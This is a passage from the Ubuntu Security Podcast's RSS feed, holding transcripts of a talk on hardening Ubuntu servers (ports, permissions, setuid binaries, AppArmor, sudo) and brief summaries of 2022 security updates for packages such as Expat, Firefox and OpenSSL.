applications once deployed on your hardened Ubuntu system. This includes
steps towards reducing your attack surface, using MAC to provide POLA and
other good security hygiene practices. Listen on to find out more.</li>
</ul>
<p>Hello listener! Welcome back to our Ubuntu hardening podcast mini-series,
where in three episodes, released across several weeks, we have been
discussing how to build a network service in an Ubuntu operating system,
but not just any Ubuntu operating system, and instead, a HARDENED one. Up
until this point, we went from nothing to digital big bang, which was the
equivalent of our system install; to years of chemical, geological, and
climatic transformations, which were actually a few weeks maybe of setting
up basic security measures after our initial install; to, at last, the
point where we are ready to finally have our server be born, just as life
once did in our beautiful planet Earth. We reach the next stage in our
evolution and prepare ourselves to now finally install our server. Don&rsquo;t be
a cheater though, and don&rsquo;t skip any steps: if you haven&rsquo;t listened to the
other episodes, go do that before you move on here. Earth did not become
what it did in a day, so&hellip;you can spare a few minutes to listen to the
other episodes before continuing with this one. Other listeners might have
waited a few weeks, and poor Earth waited billions of years! Lucky you that
hardening your Ubuntu system is slightly easier than creating an entire
planet, and even an entire universe from scratch. Introductions made, lets
jump right in to finally getting our service and all related software up
and running in our already hardened machine. And let&rsquo;s harden it even more,
shall we?</p>
<p>I will start this off by just saying: no installing of services that don&rsquo;t
use cryptography. HTTP? Gone! FTP? Next! Telnet? Please no. Don&rsquo;t even joke
about that. Just don&rsquo;t, or I might actually just start crying unencrypted
tears of anger. Encryption technology should be here to stay, and if you
are sending sensitive data over the wire, give that data a reason to feel
safe and protected during its digital travel. Add that S to the end of the
network protocol names. Level up your HTTP and make it HTTPS. Configure
your Apache or Nginx server to use TLS. Not SSL. SSL is deprecated. TLS
version 1.2 or above. Another important thing to consider when installing
the entire stack of applications, libraries and frameworks you might need
to run your system: less is more. I actually saw this in a cooking show,
and I agree with this statement. I know we sometimes might get amazed at
the huge amount of possibilities we have whenever installing software. The
human mind has created the most incredible utilities, and we have the power
to simply install all of them with one simple command. But just because you
have a wide variety of ingredients, it doesn&rsquo;t mean you have to use
them. Some people might like french fries with ice cream. That does not
imply you need a french fry library to get your sundae application to be
delicious. Sometimes a little chocolate sauce drizzle is all you
need. Chef&rsquo;s kiss! The point here is: install the minimum necessary to run
your application. Don&rsquo;t increase the attack surface. The more you have
running in your system, the more possibilities of entry an attacker will
have. Keep it short and sweet and avoid getting lost in a sea of files,
users and processes that you don&rsquo;t know how they really work or what they
really do. And while we are at it&hellip;if you do have the chance, try to
install only one or two network services per system/device. Don&rsquo;t have your
server simultaneously be a web server, a mail server, a file server, a
database server, and an ice cream server, because why not, right? Don&rsquo;t,
though. This limits the number of services that can be compromised if a
compromise ends up happening. It limits the exposure for a single
device. Plus, when installing the applications necessary to run these
services, remember that a lot of applications like Apache, Nginx, MySQL,
PHP…they all have security settings. They know they are the regular targets
of attacks, so they provide the user with the tools to perform a secure
install or set secure post install configuration values. If it is provided
to you, use it! Harden your application as well, after all, it is this
application that will most likely be the point of entry into your
system. So divide, secure and conquer!</p>
<p>We did it, friends. We have a device providing a service over the
network. One would think that after 6 days of work creating a digital
ecosystem we would be able to rest on the 7th day, as done by some mighty
entities before us, however&hellip;people concerned with cyber security don&rsquo;t
sleep. Or stop. Ever! Cyber security is a continuous effort, so post
application setup measures must be taken as well if you want your server to
keep securely thriving. We have got to ensure the evolution of the species
and keep our metaphorical Earth safe and in tiptop shape in order to
guarantee the best chances of, not only, survival, but growth and
prosperity. Who needs sleep when you can have the joy of knowing that you
set up your device for execution success and longevity in the grueling
environment that is the Internet! Let&rsquo;s start then by disabling unnecessary
open ports and stopping the execution of unwanted services. You set up your
application using the minimum necessary, which is great. Sometimes,
however, during install, or even during configuration, applications will
open ports and setup services you might not need. Heck, we are talking
about this in the post application install and setup phase of our process,
however, this could also be done in the post installation of the operating
system phase of the process. Checking out which ports are unnecessarily
open, and closing these ports will reduce the attack surface area in your
system, as an attacker has less points of entry to choose from. A house
with one door and one door only provides one single point of entry to an
external entity. Of course this external entity could manufacture a new
entry point using mechanical tools, but I then digress from the real
intention of this analogy, so let&rsquo;s stick to the basics of the idea here,
shall we? An example of an unnecessary open port might be a database
port. Sure, you have set up a host based firewall as we have already
suggested, and no internet traffic which would have this service as a
destination is allowed through, but still&hellip;layers!!! When we talk about
security we talk about having various and various layers that will protect
you in case the previous one has somehow been cracked. So&hellip;trust your
firewall without trusting it completely. If you don&rsquo;t need the database
port open to the entire Internet, only to localhost, then leave it open
just for localhost. If you don&rsquo;t want to do it for yourself, then do it for
me? Please? It makes me a lot less nervous knowing that a multitude of
unused open ports are being closed and removed from harm&rsquo;s way. The
Internet can be a brutal place, you know? Use a tool such as &rsquo;netstat&rsquo;,
check your open ports and disable Internet access for those that don&rsquo;t need
it through the related application&rsquo;s configuration file or other available
resources. It&rsquo;ll be quicker than you think, and will provide you with long
term peace of mind. Bonus points for the fact that you will know something
weird might be happening when you see that some port that should not be
accessible through cyberspace is being used to send some data to some shady
IP address in a remote country. Syslog mail incoming!</p>
<p>This same idea applies to unwanted services or unwanted daemons. Check out
what is set to run automatically or in the background of your system, check
your &lsquo;cron&rsquo; files, and make sure that these background programs that might
be a risk are not just there executing with the sole purpose of being
exploited. Only the bare minimum necessary! Let&rsquo;s not be digital gluttons
here, after all, gluttony is one of the seven deadly sins. Deadly for your
poor server which will have that background daemon cleaning files in a
directory that did exist in the system, but doesn&rsquo;t anymore, and is now
completely useless. Yeah, that server gets exploited by an attacker that
was able to leverage an unpatched zero-day in your Internet facing
application. No, you might not have been able to defend yourself against
the zero-day, but you definitely would’ve been able to avoid a more
sophisticated attack against your device had you not let an unnecessary
vulnerability prone daemon execute in your system just for the fun of
it. The attacker gets in through an issue that is not your fault, but gets
to stay and cause more problems because you were too software hungry to
delete something that was no longer needed by the system. More software,
more vulnerabilities. Another important thing to note here: this is a
continuous effort, remember? Yes, we are talking about post application
installation and setup security measures that be applied to your system in
order for it to be hardened, however, since the application environment
will change together with the application, it is necessary to maintain the
system and reanalyze all that has been setup in order to update the
hardening in case it is necessary. Your hardening needs to evolve together
with your software and your application.</p>
<p>We haven&rsquo;t yet talked about or dove deep into the elephant in the room
subject that is system files. We surrounded the subject, got close to it
here and there, but we still have not faced it head on, so let&rsquo;s go for it
now. Files contain the data which we analyze, which we process, which we
use to perform our computing, since even execution of a program begins with
the file containing the code that is to be executed. In Linux, and
consequently in Ubuntu, everything is a file. This essentially means files
will contain everything an attacker needs to compromise a system. They
might want to just read a file and steal its data, they might want to edit
a text configuration file and change the behavior of an application, or
they might want to create a file from scratch which will be a program that,
when run, will do malicious things in the system. The possibilities with
files are endless, and that is why file permissions must be treated with
the utmost care. We must protect the bricks that make up our operating
system. You have your server running. You have everything you need on the
system and you won&rsquo;t be performing any further install or making any
further changes critical to the service any time in the near future. So why
not spend some time checking your application files and your system files
to make sure they do not have any suspicious or possibly harmful
permissions? What files in the system contain sensitive data that shouldn&rsquo;t
be accessed by every user? Which files can be read by all, but should have
their editing permissions restricted only to the system administrator?
Which executables are allowed to be executed by a specific group of users
but not by any other user in the system due to dangerous commands being a
part of the compiled code? This analysis must be made and sometimes default
permissions must be questioned, since the idea is that you tailor your
environment to your needs. Use &lsquo;chmod&rsquo; and &lsquo;chown&rsquo; to get your permissions
right and protect your files.</p>
<p>An additional point of concern: &lsquo;suid&rsquo; and &lsquo;sgid&rsquo; binaries that might be
available in the system. It is interesting to disable files for which this
permission is unwanted, possibly because it can easily be exploited by an
attacker for privilege escalation or even worse. For those unaware, a
&lsquo;setuid&rsquo; or &lsquo;setgid&rsquo; binary will allow a user to execute the program that
is this binary considering privileges that are not necessarily the ones set
for this user. The execution will happen with the privileges of the file
owner or the file group instead. Think about the &lsquo;ping&rsquo; program, for
example. Our old friend, &lsquo;ping&rsquo;. &lsquo;Ping&rsquo; is a &lsquo;setuid&rsquo; binary owned by
&lsquo;root&rsquo;. Whenever a user executes the &lsquo;ping&rsquo; program, they run it with
&lsquo;root&rsquo; privileges, and this is generally necessary, since &lsquo;ping&rsquo; requires
the opening of a socket and this is not an operation that can be initiated
by any random user in the system. However, since &lsquo;ping&rsquo;, IN THEORY, is
pretty harmless, letting a user acquire the temporary privilege to open the
socket and get &lsquo;ping&rsquo; to run is a solution. Let&rsquo;s consider, however, a
situation where the &lsquo;ping&rsquo; file&rsquo;s permissions are changed to allow any user
to edit it, so, writing to the file is available to everyone who wishes to
do it. Makes me nervous just thinking about it…A user with little
privileges in the system is then able to edit the file and change its
contents to that of a program that runs &lsquo;ping&rsquo;, but at the end also opens a
new shell. When this new &lsquo;ping&rsquo; is executed with &lsquo;root&rsquo; privileges, the new
shell that is opened can be opened with &lsquo;root&rsquo; privileges as well. See the
problem here? Of course this is an example, and default permissions for the
&lsquo;ping&rsquo; executable do not allow any user to write to the file, the only user
allowed to do that being &lsquo;root&rsquo;. The point here is to show the dangers of
the &lsquo;setuid&rsquo; and &lsquo;setgid&rsquo; binaries and encourage you to look at your system
and disable these permission bits for files where this is not necessary,
where setting them is not needed. Maybe you don&rsquo;t need your users to run
&lsquo;ping&rsquo; at all, so why not let just those with &lsquo;sudo&rsquo; privileges involving
network access be allowed to actually run it? Disable the &lsquo;setuid&rsquo; bit and
limit usage of &lsquo;ping&rsquo; to those who really need it. The same goes to any
other &lsquo;setuid&rsquo; binary any fresh software install might have created. Or
even files you have created and set permissions to yourself. &lsquo;Setuid&rsquo; and
&lsquo;setgid&rsquo; binaries are very commonly leveraged by attackers to exploit a
system, so having less of them is a good measure to apply in order to
reduce your attack surface. Also&hellip;let&rsquo;s continue doing continuous work
here, and always check permissions and &lsquo;suid&rsquo; or &lsquo;sgid&rsquo; for new files that
are welcomed into our system, or old ones that are updated.</p>
<p>What&rsquo;s next then? We seem to have covered all of our bases, securing every
part of our system. Go us! However, some say that teamwork is the best kind
of work, so let&rsquo;s increase our hardening by going beyond our lonely manual
configurations and implementations and use some security software to help
us. You are not alone in the digital world. You are not the only one trying
to make your device more secure and trying to protect it against Internet
predators. A lot of people have developed a lot of software to help us
strengthen our defenses and better manage security in our devices. So here
are a few to consider: &lsquo;fail2ban&rsquo;, which is an intrusion detection and
prevention system that will analyze your log files and block suspicious
activity through your firewall should any suspicious activity be
detected. Other open source software out there like Snort and Suricata can
also be used to achieve similar things to this; also consider installing
malware detecting software with ClamAV or exploit detecting software with
RootkitHunter; 2FA is highly recommended nowadays to anyone that wishes to
use authentication in a secure manner, so why not implement it directly in
your Ubuntu OS? Through Google&rsquo;s PAM package, for example, it is possible
to set 2FA for users logging into your machine, using &lsquo;sudo&rsquo;, doing
everything in the system that requires a password! NO, don&rsquo;t even think
about considering the use of a less strong password because of this, but do
see it as another layer added to the various others we have been building
up here to keep your system secure; another authentication alternative is
considering the usage of a centralized authentication system, where your
users are not authenticated locally, but instead in a remote server
dedicated to this type of service. Of course, do not forget that usually, a
service providing device, such as your own server, will have local
application-only users that do not need to be authenticated with this other
centralized authentication unit in order to run their activities in the
device, so do configure those properly. However, for users that are a part
of your organization layout, it might be interesting to consider
outsourcing your authentication needs to this extra server. Keep in mind,
however, that this increases the attack surface for your infrastructure in
general, since you add to it an entirely new service device, and apply it
only if the pay-off is worth it to you and you entire structure; and last
but not least, do consider using software that enforces Mandatory Access
Control, such as SELinux, and of course, the one and only AppArmor.</p>
<p>Mandatory Access Control, or MAC, for short, is the counterpart to DAC, or
Discretionary Access Control. In DAC we have that access control is
performed in such a way that access is allowed to resources based on the
identity of a user and what the resource owners allow or not for that user
in that resource. Here, all the OS can do is enforce permissions based on
identity limits set by this resource owner. On the other hand, MAC is the
type of access control where a policy administrator, which is usually the
&lsquo;root&rsquo; user, but can be another administrative user, is the one to
establish access permissions to a resource, no matter the owner of that
resource. The policy administrator is able to make such choices not only
based on the resource but also based on the entity which will access it as
well, this entity possibly being a user, or even a program, and resources
being files, network devices and other programs. The operating system can
then enforce access beyond the one set by the resource owner and
considering more than just the identity of the entity that wishes to access
the resource. In DAC, permissions for a specific resource can be easily
changed by the user that owns it. The Linux file system permissions are an
example of DAC. Changes to these permissions, as simple as they may be, can
result in programs or users being able to interact with resources they
normally shouldn&rsquo;t, and the ever untrustworthy user is the only one
standing in the way of that. On the other hand, in MAC, with permissions or
sets of permissions being defined by a policy administrator only, a random
user can no longer change the ones associated with a resource just because
they own it. Well, they can, through DAC, but changing overall resource
permissions will no longer be as easy as just running &lsquo;chmod&rsquo;. That is
because, as an additional layer to the checks performed to the DAC set, MAC
will give more granularity to the access control process, and, based on the
rules set by the policy administrator, define in an owner independent
manner, what users or programs can access in the system based on who they
are, and based on what permissions they have assigned to them regarding
each specific resource. And if some shady entity wants to maybe bypass
that, they will have to go through the dead body of the kernel of the
operating system, which is a much harder beast to face. Even though DAC
might be a more flexible way to set resource permissions, MAC is usually
considered the more secure alternative and it can even be used as a
complimentary measure on top of DAC to add more security to your
system. You can do this, for example, by activating the AppArmor kernel
security model in your Ubuntu OS, and it will allow you to restrict actions
that running processes can take and resources they can access. AppArmor,
therefore, will bind programs, and confine them, reducing the range of
harmful operations a program might be able to execute in your system. Each
program will have a profile associated with it, and these will contain
access rules which, when broken, can have the related attempt simply
reported, or instead blocked. An example would be disallowing access to a
certain directory for the process that is your web server. The web server
should only access web server related directories and files and AppArmor
can be set up to guarantee that. Joining DAC and MAC in your system will
allow you to build up your security layers very efficiently, so do consider
learning more about software that allows this to happen, as it will bring
you closer to the hardened utopia we all look forward to achieving.</p>
<p>We did it. We created an inhabitable and secure ecosystem. Just like Earth
after the many, many, MANY years that came after the big bang. Thankfully
it didn&rsquo;t take us that long, although it wasn&rsquo;t a walk in the park getting
all that hardening done. Our job, however, is never complete, as cyber
security is a continuous effort. Have I already mentioned this? I can&rsquo;t
remember. Anyway, the idea is to keep hardening even after all is set and
done to run your service. How can this be achieved?</p>
<p>Well, for starters, keep your Ubuntu system updated and install patched
package versions when possible. Yes, sometimes updating breaks the system,
but between spending time to maybe adjust to changes, and spending a lot of
nights awake having to choo away an attacker instead, which one would you
rather do? Another thing that needs to be done, always, is maintenance of
users, groups and files in the system. I already mentioned this, but I am
bringing it up again because it is very important. Your server is now a
living entity, working to provide data and utilities to users all across
the Internet. Seasons will change, updates will happen, files will
transform, users will come and go, but you will stay. You will stay and
update user and file permissions according to what is applicable to your
ever changing system for that point in time. Don&rsquo;t assume that your initial
configuration of users and files will apply forever. What is forever though
is your effort to monitor and manage this system you have brought to
life. Pretty words to live by, and what we should actually be doing with
our planet, you know&hellip;taking care of it&hellip;but I once again digress. And
just as a last tip&hellip;to end this suggestion list in a very random and
abrupt manner: shred your files, don&rsquo;t just remove them from a
system. Deleting a file simply removes the reference to it in a filesystem,
meaning someone can still dig it up from the disk should they be determined
enough to do it. Get rid of sensitive data the correct way and overwrite in
disk that which will no longer be used in your server.</p>
<p>We finally reach the end my friends, and the key takeaway here is: every
system is unique, and every service will have its own infrastructure and
needs. Do not apply all of the changes suggested here if they don&rsquo;t bring
any benefits to you. Mom used to tell you to eat your vegetables, but if
you are allergic to one of them, I am sure she wouldn&rsquo;t encourage you to do
it, especially if you don&rsquo;t like eating it! What I mean here is: all we
have here are suggestions, some which might be amazing and super useful to
you, some that won&rsquo;t work. Know your system and you will definitely know
what will work best for you. This might even be my actual last tip, if I
haven&rsquo;t made this clear enough with all I have said previously: know your
IT infrastructure well, and you will better know how to manage it and how
to defend it. Hardening might prevent a lot from happening, keeping you
safe from various intended attacks, however, creativity has always been the
evolution of man, and creative hackers are plenty out there, so it might be
that your hardening sometimes might fail you. If you know your system well,
though, you might just be the last layer of hardening the system needs to
kick out that hacker that was able to worm their way into the network. Keep
your planet orbiting around the sun, keep your ecosystem alive and well,
and do it by knowing how it works and by taking care of it when what used
to work might not anymore.</p>
<p>That is all for today&rsquo;s listeners! I hope you enjoyed all of the hardening
suggestions we had for you in this and in the two previous episodes, and I
hope you get to use them in your own systems to make them more secure! As
always, do feel free to share your thoughts in our social media channels,
and for now, I bid you all farewell and until next time! Bye!</p>
<h3 id="python3-dot-10-has-pie-enabled-for-ubuntu-22-dot-04-lts-----38-16">Python3.10 has PIE enabled for Ubuntu 22.04 LTS (🥧) [38:16]</h3>
<ul>
<li><a href="https://ubuntusecuritypodcast.org/episode-151/">Episode 151</a></li>
<li>Thanks to Foundations team, in particular Matthias Klose (doko)</li>
<li><a href="https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1452115">https://bugs.launchpad.net/ubuntu/+source/python2.7/+bug/1452115</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E154.mp3" length="26904834" type="audio/mpeg" /><itunes:duration>2454</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 153
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-153/</link>
          <pubDate>Fri, 18 Mar 2022 13:35:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>3285a277080931fea885712b985076cf003d22e8d2b4285f8ec0539e9000c19b7222c174f3f8ffd0224bb8a73660e7346f79581802b9787cc4d250afe08641f7</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 153</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we bring you part 2 of Camila's guide on Ubuntu server hardening,
  plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL,
  LibreOffice and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we bring you part 2 of Camila's guide on Ubuntu server hardening,
  plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL,
  LibreOffice and more.
  </itunes:summary>
        <description>  This week we bring you part 2 of Camila's guide on Ubuntu server hardening,
  plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL,
  LibreOffice and more.
  </description>
        <googleplay:description>  This week we bring you part 2 of Camila's guide on Ubuntu server hardening,
  plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL,
  LibreOffice and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we bring you part 2 of Camila&rsquo;s guide on Ubuntu server hardening,
plus we cover vulnerabilities and updates in Expat, Firefox, OpenSSL,
LibreOffice and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>22 unique CVEs addressed</p>
<h3 id="usn-5320-1-expat-vulnerabilities-and-regression-00-45">[<a href="https://ubuntu.com/security/notices/USN-5320-1">USN-5320-1</a>] Expat vulnerabilities and regression [00:45]</h3>
<ul>
<li>4 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25315">CVE-2022-25315</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25314">CVE-2022-25314</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25313">CVE-2022-25313</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25236">CVE-2022-25236</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Includes a fix for a regression from the previous Expat update in
<a href="https://ubuntu.com/security/notices/USN-5288-1">USN-5288-1</a> (<a href="https://ubuntusecuritypodcast.org/episode-150/">Episode 150</a>) (<a href="https://ubuntu.com/security/CVE-2022-25236">CVE-2022-25236</a>) - plus fixes for 3 additional
CVEs
<ul>
<li>stack overrun through a deeply nested DTD</li>
<li>2 different integer overflows on crafted contents as well
<ul>
<li>∴ buffer overflow → DoS / RCE</li>
</ul>
</li>
</ul>
</li>
</ul>
<h3 id="usn-5321-1-firefox-vulnerabilities-01-45">[<a href="https://ubuntu.com/security/notices/USN-5321-1">USN-5321-1</a>] Firefox vulnerabilities [01:45]</h3>
<ul>
<li>7 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26387">CVE-2022-26387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26385">CVE-2022-26385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26384">CVE-2022-26384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26383">CVE-2022-26383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26382">CVE-2022-26382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26381">CVE-2022-26381</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0843">CVE-2022-0843</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>98.0 - usual web issues plus possible signature verification bypass when
installing addons / extensions - TOCTOU issue allowing a local user to
trick another user into installing an addon with an invalid signature -
prompts user after verifying signature - so whilst the user is
acknowledging / accepting the prompt could swap out the extension on disk
with a different one</li>
</ul>
<h3 id="usn-5323-1-nbd-vulnerabilities-02-59">[<a href="https://ubuntu.com/security/notices/USN-5323-1">USN-5323-1</a>] NBD vulnerabilities [02:59]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26496">CVE-2022-26496</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-26495">CVE-2022-26495</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Stack buffer overflow in nbd-server via a crafted message with a large
name value - crash / RCE?</li>
</ul>
<h3 id="usn-5324-1-libxml2-vulnerability-03-33">[<a href="https://ubuntu.com/security/notices/USN-5324-1">USN-5324-1</a>] libxml2 vulnerability [03:33]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-23308">CVE-2022-23308</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF depending on semantics of application using libxml2 - <code>xmlGetID()</code>
returns a pointer to just-freed memory - so if application has not done
other memory modification etc then likely is fine - although is UB and
other applications may not be so mundane so still worth patching</li>
</ul>
<h3 id="usn-5325-1-zsh-vulnerabilities-04-28">[<a href="https://ubuntu.com/security/notices/USN-5325-1">USN-5325-1</a>] Zsh vulnerabilities [04:28]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-45444">CVE-2021-45444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20044">CVE-2019-20044</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible to regain privileges even after zsh has dropped privileges (via
the <code>--no-privileged</code> option) by loading a crafted module that then calls
setuid()</li>
<li>Possible code execution if can control the output of a command used
inside the prompt - since would recursively evaluate format directives
from the output as well as the original prompt specification</li>
</ul>
<h3 id="usn-5327-1-rsh-vulnerability-05-31">[<a href="https://ubuntu.com/security/notices/USN-5327-1">USN-5327-1</a>] rsh vulnerability [05:31]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-7282">CVE-2019-7282</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Possible for a malicious server to bypass intended access restrictions in
a client through a crafted filename - can then get the client to modify
permissions of a target directory on the client</li>
<li>Why are you still using rsh in 2022? Please switch to ssh</li>
</ul>
<h3 id="usn-5328-1-usn-5328-2-openssl-vulnerability-06-20">[<a href="https://ubuntu.com/security/notices/USN-5328-1">USN-5328-1</a>, <a href="https://ubuntu.com/security/notices/USN-5328-2">USN-5328-2</a>] OpenSSL vulnerability [06:20]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0778">CVE-2022-0778</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>taviso - possible infinite loop when parsing crafted cerificates - can
allow a malicious client/server to DoS the other side</li>
</ul>
<h3 id="usn-5330-1-libreoffice-vulnerability-06-56">[<a href="https://ubuntu.com/security/notices/USN-5330-1">USN-5330-1</a>] LibreOffice vulnerability [06:56]</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-25636">CVE-2021-25636</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted document could cause Libreoffice to be confused and to present UI
to the user indicating a document was correctly signed and had not been
altered when in fact this was not the case - essentially 2 related fields
can exist in the document and it would use the wrong one to show
signature state</li>
</ul>
<h3 id="usn-5329-1-tar-vulnerability-07-42">[<a href="https://ubuntu.com/security/notices/USN-5329-1">USN-5329-1</a>] tar vulnerability [07:42]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-20193">CVE-2021-20193</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Crafted tar file could cause tar to consume an unbounded amount of memory
-&gt; crash -&gt; DoS</li>
</ul>
<h3 id="usn-5331-1-tcpdump-vulnerabilities-08-12">[<a href="https://ubuntu.com/security/notices/USN-5331-1">USN-5331-1</a>] tcpdump vulnerabilities [08:12]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8037">CVE-2020-8037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16301">CVE-2018-16301</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Buffer overflow in command-line argument parser - local attacker who can
create a 4GB file and cause tcpdump to use this via the <code>-F</code> argument could
cause a possible crash / RCE</li>
<li>Large memory allocation in PPP decapsulator -&gt; crash -&gt; DoS</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="camila-discusses-ubuntu-hardening--part-2--08-58">Camila discusses Ubuntu hardening (part 2) [08:58]</h3>
<ul>
<li>In the second part of this series on hardening a Ubuntu machine against
external attack, Camila looks at steps you can take post-install to
secure your machine. See below for a full transcript.</li>
</ul>
<h4 id="transcript">Transcript</h4>
<p>Hello listener! I have returned with the second part of our Ubuntu
hardening podcast episode. You asked for it, and you&rsquo;ve been waiting for
more, and I am here to oblige. We were last seen concluding our Ubuntu
install, bringing into fruition our digital big bang, which would then
allow us to start setting up our galaxy, preparing our Earth-server
environment to receive life in the form of code. Today, we dive into the
hardening measures we can apply to our Ubuntu system right after a fresh
install, but right before a server application setup. However, stop here
and go listen to the last episode if you haven&rsquo;t yet, or else you might be
a little bit lost among the metaphorical stars. I&rsquo;ll pause here so you can
pause as well and go check that out. Back already? I will trust you, and
believe that you now know how to harden your Ubuntu system during install,
so let&rsquo;s get moving and talk about what&rsquo;s next!</p>
<p>Usually when you install an operating system you define the super user&rsquo;s
password during install&hellip;a <strong>ahem</strong> strong password. Right? Why am I talking
about this in the post install section then? Because Ubuntu does not
encourage usage of the &lsquo;root&rsquo; user. If you remember correctly, or if you
don&rsquo;t, but you decide to do an install right now, you will remember/notice
that during install you create a new user for the Ubuntu system that is not
&lsquo;root&rsquo;. As previously defined, this user will have a strong password -
RIGHT? - and by default, this user will also have full &lsquo;sudo&rsquo; capabilities,
and the idea is to use this user account instead of the root account to
perform all necessary operations in the system. &lsquo;Root&rsquo; will exist in the
system but it has no password set, meaning that &lsquo;root&rsquo; login is also
disabled by default. This is actually a good thing, considering that you
shouldn&rsquo;t be using the &lsquo;root&rsquo; user to perform basic activities in your
system. &lsquo;Root&rsquo; is just too powerful and your Ubuntu system knows that. That
is why it creates a new user that has as much and enough power in the
system, but that can be controlled through the appropriate configuration of
&lsquo;sudo&rsquo;. To run a privileged command through use of &lsquo;sudo&rsquo;, a user will need
to know the &lsquo;sudo&rsquo; user&rsquo;s password, so that is an extra layer of protection
added to privileged commands in the system, as well as an extra layer of
protection that prevents you from destroying everything after you decide to
drink and type. Additionally, &lsquo;sudo&rsquo; calls result in the inclusion of
information regarding such a call into a log file, which can be used for
auditing and for threat analysis in your system through usage of other
installed tools. &lsquo;Sudo&rsquo;, if configured correctly, will allow you to have
more control over a user&rsquo;s privileges in your system.  By editing the
/etc/sudoers file , you can define which groups in the system have which
&lsquo;sudo&rsquo; privileges, meaning, which users are allowed to run specific
commands with the privileges of another user, which is usually &lsquo;root&rsquo;. As a
result, you don&rsquo;t have to worry about coming across a situation where
someone logs in directly as &lsquo;root&rsquo; and starts wreaking havoc in your
system. You have created the appropriate users and groups, and have
attributed the appropriate privileges to each when editing the &lsquo;sudoers&rsquo;
file. All users have strong passwords, and whenever they need to execute
privileged commands, they have to enter this password, which makes it
